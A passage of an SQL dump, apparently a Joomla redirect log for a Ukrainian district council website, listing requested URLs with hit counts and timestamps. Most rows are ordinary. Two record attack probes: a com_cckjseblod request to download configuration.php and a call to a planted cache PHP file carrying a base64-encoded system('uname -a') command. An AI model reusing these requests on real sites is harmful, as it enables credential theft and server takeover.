00:00:00',301),(28020,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1007:-4-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 21:30:27','0000-00-00 00:00:00',301),(28021,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=192:2010-12-15-13-29-12&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 21:30:27','0000-00-00 00:00:00',301),(28022,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/30-iz-zhittja-rajonu','','','',3,0,'2016-03-31 22:06:17','0000-00-00 00:00:00',301),(28023,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/423-visti-iz-fedorivki-za-materialami-trs-polissja','','','',4,0,'2016-03-31 22:06:42','0000-00-00 00:00:00',301),(28024,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/425-visti-iz-vladivki-za-materialami-trs-polissja','','','',4,0,'2016-03-31 22:07:10','0000-00-00 00:00:00',301),(28025,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=416:2011-09-29-06-48-53&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 22:23:34','0000-00-00 00:00:00',301),(28026,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=795:-20-2011-108-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 22:31:50','0000-00-00 00:00:00',301),(28027,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=716:2012-06-14-15-19-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 22:32:03','0000-00-00 00:00:00',301),(28028,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1266:2014-04-03-05-25-14&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 22:59:03','0000-00-00 00:00:00',301),(28029,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-31 23:04:06','0000-00-00 00:00:00',301),(28030,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=739:2012-07-23-12-44-57&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 23:26:25','0000-00-00 00:00:00',301),(28031,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=699:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 23:27:09','0000-00-00 00:00:00',301),(28032,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=480:2011-11-28-10-11-58&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 23:45:53','0000-00-00 00:00:00',301),(28033,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1185:2014-01-28-09-38-54&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 23:52:34','0000-00-00 00:00:00',301),(28034,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 23:54:27','0000-00-00 00:00:00',301),(28035,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=554:-l-r&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 23:58:01','0000-00-00 00:00:00',301),(28036,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1019:2013-06-06-11-26-38&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 00:07:46','0000-00-00 00:00:00',301),(28037,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=866:2012-12-14-06-58-01&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 00:07:47','0000-00-00 00:00:00',301),(28038,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=892:2013-01-08-13-26-18&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-01 00:17:09','0000-00-00 00:00:00',301),(28039,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-01 00:17:15','0000-00-00 00:00:00',301),(28040,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=924:2013-02-20-19-06-08&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 00:21:07','0000-00-00 00:00:00',301),(28041,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=954:-19-6-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 00:50:44','0000-00-00 00:00:00',301),(28042,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1051:--------4------&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-01 01:17:13','0000-00-00 00:00:00',301),(28043,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=272:-2010-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 01:29:24','0000-00-00 00:00:00',301),(28044,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=479:2011-11-28-07-33-14&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 01:29:24','0000-00-00 00:00:00',301),(28045,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1082:------------2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 01:29:25','0000-00-00 00:00:00',301),(28046,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=956:2013-03-07-14-51-33&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 01:33:40','0000-00-00 00:00:00',301),(28047,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=833:2012-11-30-06-51-18&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 01:33:41','0000-00-00 00:00:00',301),(28048,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=730:2012-07-02-05-04-18&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 01:53:34','0000-00-00 00:00:00',301),(28049,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=708:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 01:53:35','0000-00-00 00:00:00',301),(28050,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=347:2011-06-15-12-33-18&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 02:10:31','0000-00-00 00:00:00',301),(28051,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1269:----3110&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-01 02:19:42','0000-00-00 00:00:00',301),(28052,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=708:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 02:19:43','0000-00-00 00:00:00',301),(28053,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=975:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 02:19:43','0000-00-00 00:00:00',301),(28054,'http://www.malyn-rayrada.org.ua/index.php?Itemid=5&catid=2:2010-06-05-12-50-39&id=7:2010-06-05-14-44-23&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 02:54:44','0000-00-00 00:00:00',301),(28055,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=189:2010-12-15-13-21-57&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 03:20:15','0000-00-00 00:00:00',301),(28056,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1011:2013-05-29-09-51-28&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 03:23:27','0000-00-00 00:00:00',301),(28057,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=546:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 03:46:42','0000-00-00 00:00:00',301),(28058,'http://www.malyn-rayrada.org.ua/index.php?Itemid=58&catid=27:---1932-33-&id=142:2010-10-15-06-19-49&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 03:46:45','0000-00-00 00:00:00',301),(28059,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=321:------------l---------r--2011-2016-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 04:35:31','0000-00-00 00:00:00',301),(28060,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1275:2014-04-10-13-24-47&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-01 04:39:19','0000-00-00 00:00:00',301),(28061,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=38:--19122011-&id=523:2011-12-30-10-16-28&itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 04:43:54','0000-00-00 00:00:00',301),(28062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=507:2011-12-19-17-10-52&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 04:55:19','0000-00-00 00:00:00',301),(28063,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=577:--------2011--&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 05:29:21','0000-00-00 00:00:00',301),(28064,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/715-mi-povinni-znati-vsju-pravdu','','','',4,0,'2016-04-01 06:04:47','0000-00-00 00:00:00',301),(28065,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1010:-22-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 06:05:02','0000-00-00 00:00:00',301),(28066,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=273:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 06:17:30','0000-00-00 00:00:00',301),(28067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=30:2010-06-07-12-16-56&catid=20&Itemid=42&lang=uk','','','',1,0,'2016-04-01 06:20:31','0000-00-00 00:00:00',301),(28068,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=530:-4050-vi-l-r-1-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-01 06:32:17','0000-00-00 00:00:00',301),(28069,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=471:2011-11-21-08-33-43&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 07:47:54','0000-00-00 00:00:00',301),(28070,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=836:-6732012&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 07:50:39','0000-00-00 00:00:00',301),(28071,'http://www.malyn-rayrada.org.ua/index.php?id=43:--25072012-&Itemid=82&lang=uk&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-04-01 07:54:33','0000-00-00 00:00:00',301),(28072,'http://malyn-rayrada.org.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',1,0,'2016-04-01 09:05:37','0000-00-00 00:00:00',301),(28073,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=598:2012-02-29-14-13-44&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 09:20:01','0000-00-00 00:00:00',301),(28074,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-01 09:37:14','0000-00-00 00:00:00',301),(28075,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=706:-qq-2012-2015-&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 09:43:00','0000-00-00 00:00:00',301),(28076,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=946:-l-r-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 10:06:41','0000-00-00 00:00:00',301),(28077,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/890-2014-01-06-08-19-15?lang=en','','','',1,0,'2016-04-01 10:06:52','0000-00-00 00:00:00',301),(28078,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-01 10:55:42','0000-00-00 00:00:00',301),(28079,'http://malyn-rayrada.org.ua/index.php/101-hristijanskij-svit-svjatkue-verbnu-nedilju-ta?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-04-01 11:13:49','0000-00-00 00:00:00',301),(28080,'http://malyn-rayrada.org.ua/index.php/1054-z-24-lyutogo-po-24-bereznya-v-ukrajini-provodivsya-misyachnik-borotbi-z-tuberkulozom?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-04-01 11:13:54','0000-00-00 00:00:00',301),(28081,'http://malyn-rayrada.org.ua/index.php/1066-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-04-01 11:14:01','0000-00-00 00:00:00',301),(28082,'http://malyn-rayrada.org.ua/index.php/19-pro-nadannja-groshovoi-dopomogi-z-nagodi-69-i?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-04-01 11:15:13','0000-00-00 00:00:00',301),(28083,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01','','','',2,0,'2016-04-01 11:15:18','0000-00-00 00:00:00',301),(28084,'http://malyn-rayrada.org.ua/index.php/730-sogodni-ves-svit-vidznachae-200-richnij-juvilej','','','',3,0,'2016-04-01 11:15:28','0000-00-00 00:00:00',301),(28085,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=699:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 11:26:53','0000-00-00 00:00:00',301),(28086,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=315:2011-05-20-13-07-47&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 11:57:39','0000-00-00 00:00:00',301),(28087,'http://malyn-rayrada.org.ua/administrator/cache/tmp48190139.php?m=cHJpbnQgJ1NBRG9pamR3aW9qb2lqb2owOSc7c3lzdGVtKCd1bmFtZSAtYScpOw==','','','',1,0,'2016-04-01 12:23:37','0000-00-00 00:00:00',301),(28088,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&lang=en&option=com_content&view=article','','','',1,0,'2016-04-01 12:30:16','0000-00-00 00:00:00',301),(28089,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=918:-2013-2015-&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 13:39:41','0000-00-00 00:00:00',301),(28090,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/30-iz-zhittja-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-01 13:43:29','0000-00-00 00:00:00',301),(28091,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/423-visti-iz-fedorivki-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-01 13:43:36','0000-00-00 00:00:00',301),(28092,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/424-visti-iz-chopovich-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-04-01 13:43:39','0000-00-00 00:00:00',301),(28093,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/425-visti-iz-vladivki-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-01 13:43:42','0000-00-00 00:00:00',301),(28094,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/426-visti-iz-pirizhok-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-01 13:43:48','0000-00-00 00:00:00',301),(28095,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/427-visti-iz-josipivki-za-materialami-trs-polissja','','','',3,0,'2016-04-01 13:43:52','0000-00-00 00:00:00',301),(28096,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/427-visti-iz-josipivki-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-01 13:43:55','0000-00-00 00:00:00',301),(28097,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=964:-2013-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 13:49:35','0000-00-00 00:00:00',301),(28098,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=615:-------26032012495-12&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 14:14:23','0000-00-00 00:00:00',301),(28099,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1044:2013-07-05-11-26-05&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-01 14:44:48','0000-00-00 00:00:00',301),(28100,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1292:-i-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-04-01 15:38:38','0000-00-00 00:00:00',301),(28101,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/424-visti-iz-chopovich-za-materialami-trs-polissja','','','',1,0,'2016-04-01 16:04:41','0000-00-00 00:00:00',301),(28102,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/586-videozvit-iz-22-sesii-malinskoi-rajonnoi-radi','','','',3,0,'2016-04-01 16:33:20','0000-00-00 00:00:00',301),(28103,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=ru&layout=blog&limitstart=25&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-04-01 17:19:51','0000-00-00 00:00:00',301),(28104,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/624-istorija-uspihu-tov-junigran?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-04-01 20:50:38','0000-00-00 00:00:00',301),(28105,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=701:-2011-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 20:59:22','0000-00-00 00:00:00',301),(28106,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-01 21:31:31','0000-00-00 00:00:00',301),(28107,'http://malyn-rayrada.org.ua/index.php/1377-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-5-sesiyu-rajonnoji-radi-7-sklikannya','','','',4,0,'2016-04-01 21:38:04','0000-00-00 00:00:00',301),(28108,'http://malyn-rayrada.org.ua/index.php/1377-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-5-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-04-01 21:38:08','0000-00-00 00:00:00',301),(28109,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/654-urochistosti-z-nagodi-zavershennja-remontu-shkoli','','','',4,0,'2016-04-01 21:38:32','0000-00-00 00:00:00',301),(28110,'http://malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1376-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu-komunalnikh-unitarnikh-pidpriemstv-ta-jikh-ob-ednan','','','',2,0,'2016-04-01 21:45:39','0000-00-00 00:00:00',301),(28111,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1372-pro-reformuvannya-drukovanogo-zasobu-masovoji-informatsiji-ta-redaktsiji-zasnovnikami-spivzasnovnikami-yakikh-e-malinska-rajonna-rada','','','',3,0,'2016-04-01 21:45:47','0000-00-00 00:00:00',301),(28112,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=893:-2013-2014-&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-01 21:54:47','0000-00-00 00:00:00',301),(28113,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&lang=en&option=com_content&view=article','','','',1,0,'2016-04-01 22:41:37','0000-00-00 00:00:00',301),(28114,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=563:-30012012185-12&lang=uk&option=com_content&view=article','','','',3,0,'2016-04-02 01:13:44','0000-00-00 00:00:00',301),(28115,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=631:-i-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 02:21:14','0000-00-00 00:00:00',301),(28116,'http://www.malyn-rayrada.org.ua/index.php?catid=2010&id=415:kontaktna-informacija-3','','','',1,0,'2016-04-02 02:24:04','0000-00-00 00:00:00',301),(28117,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=741:---------l----r&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-02 02:27:57','0000-00-00 00:00:00',301),(28118,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=21','','','',1,0,'2016-04-02 03:31:23','0000-00-00 00:00:00',301),(28119,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=14','','','',1,0,'2016-04-02 03:31:23','0000-00-00 00:00:00',301),(28120,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48:--11032013-&id=961:2013-03-11-10-51-56&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-02 05:32:21','0000-00-00 00:00:00',301),(28121,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=3&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-02 06:33:26','0000-00-00 00:00:00',301),(28122,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-04-02 06:52:28','0000-00-00 00:00:00',301),(28123,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 08:11:06','0000-00-00 00:00:00',301),(28124,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=503:-2017-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 08:46:36','0000-00-00 00:00:00',301),(28125,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=620:2012-03-29-10-03-40&lang=en&option=com_content&view=article','','','',2,0,'2016-04-02 08:46:44','0000-00-00 00:00:00',301),(28126,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 08:46:49','0000-00-00 00:00:00',301),(28127,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=930:2013-02-21-09-13-00&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-02 11:33:16','0000-00-00 00:00:00',301),(28128,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=514:2011-12-22-10-03-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 11:39:09','0000-00-00 00:00:00',301),(28129,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/8 marta.jpg','','','',1,0,'2016-04-02 11:42:29','0000-00-00 00:00:00',301),(28130,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=643:-6-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-02 11:42:46','0000-00-00 00:00:00',301),(28131,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=939:-18-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-04-02 11:43:30','0000-00-00 00:00:00',301),(28132,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=545:2012-01-26-12-06-01&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-02 11:43:51','0000-00-00 00:00:00',301),(28133,'http://www.malyn-rayrada.org.ua/index.php?id=47:-21022013-&Itemid=86&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-02 12:01:19','0000-00-00 00:00:00',301),(28134,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1090:-l-r-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-02 12:03:53','0000-00-00 00:00:00',301),(28135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2016-04-02 12:03:58','0000-00-00 00:00:00',301),(28136,'http://www.malyn-rayrada.org.ua/index.php?catid=9:2010-06-05-12-55-45&id=1:2010-06-05-13-18-17&Itemid=11&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-02 12:04:41','0000-00-00 00:00:00',301),(28137,'http://www.malyn-rayrada.org.ua/index.php?catid=9:2010-06-05-12-55-45&id=1:2010-06-05-13-18-17&Itemid=11&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 12:05:07','0000-00-00 00:00:00',301),(28138,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=543:2012-01-26-11-58-53&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 13:06:04','0000-00-00 00:00:00',301),(28139,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1196:2014-01-30-14-12-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-02 15:58:32','0000-00-00 00:00:00',301),(28140,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1059-2013-07-24-05-42-15?Itemid=0&lang=en','','','',1,0,'2016-04-02 16:09:58','0000-00-00 00:00:00',301),(28141,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1059:2013-07-24-05-42-15&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-02 16:10:02','0000-00-00 00:00:00',301),(28142,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1059-2013-07-24-05-42-15?Itemid=0&lang=uk','','','',1,0,'2016-04-02 16:10:05','0000-00-00 00:00:00',301),(28143,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/586-videozvit-iz-22-sesii-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-02 16:59:45','0000-00-00 00:00:00',301),(28144,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/654-urochistosti-z-nagodi-zavershennja-remontu-shkoli?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-02 16:59:52','0000-00-00 00:00:00',301),(28145,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/715-mi-povinni-znati-vsju-pravdu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-02 16:59:57','0000-00-00 00:00:00',301),(28146,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=700:-2012-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-02 18:00:27','0000-00-00 00:00:00',301),(28147,'http://www.malyn-rayrada.org.ua/index.php?id=56:--03022014-&Itemid=97&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-02 18:52:45','0000-00-00 00:00:00',301),(28148,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-04-02 19:06:40','0000-00-00 00:00:00',301),(28149,'http://malyn-rayrada.org.ua/index.php?catid=0&id=424','','','',1,0,'2016-04-02 19:27:09','0000-00-00 00:00:00',301),(28150,'http://www.malyn-rayrada.org.ua/index.php?catid=2010&id=1225:tsvk-ofitsijni-dani-po-malinskij-miskij-radi','','','',1,0,'2016-04-03 00:43:40','0000-00-00 00:00:00',301),(28151,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=user&task=edit','','http://www.malyn-rayrada.org.ua/index.php/component/users/?task=user.login','',1,0,'2016-04-03 02:14:40','0000-00-00 00:00:00',301),(28152,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1098:2013-09-25-09-34-57&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 04:22:40','0000-00-00 